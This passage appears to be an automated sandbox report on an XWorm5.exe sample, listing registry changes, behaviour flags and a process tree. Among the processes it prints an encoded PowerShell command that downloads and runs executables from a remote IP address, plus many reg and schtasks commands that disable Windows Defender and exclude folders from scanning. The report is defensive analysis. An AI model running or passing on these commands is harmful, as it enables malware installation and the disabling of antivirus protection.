| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\mspaint.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\mspaint.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-844837608-3875958368-2945961404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000000c00992db9e7d901928e2fa5fdead901928e2fa5fdead90114000000 | C:\Windows\system32\mspaint.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb627e9758,0x7ffb627e9768,0x7ffb627e9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2068 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3576 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4668 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3824 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=1536 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4776 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5216 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4536 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5688 --field-trial-handle=1828,i,11696062691017719391,11743286500252613712,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe"
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
C:\Windows\system32\dashost.exe
dashost.exe {de126223-bcc1-4a5c-b432c1b49c9c2592}
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Users\Admin\Desktop\XWorm5.exe
"C:\Users\Admin\Desktop\XWorm5.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 264
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Temp\Msconf.exe
"C:\Users\Admin\AppData\Local\Temp\Msconf.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\softprotect.bat" "
C:\Users\Admin\AppData\Local\Temp\msvcp.exe
"C:\Users\Admin\AppData\Local\Temp\msvcp.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\PL.exe
"C:\Users\Admin\AppData\Local\Temp\PL.exe"
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb627e9758,0x7ffb627e9768,0x7ffb627e9778
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2932 --field-trial-handle=2236,i,142881780594833536,18431894468913005475,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
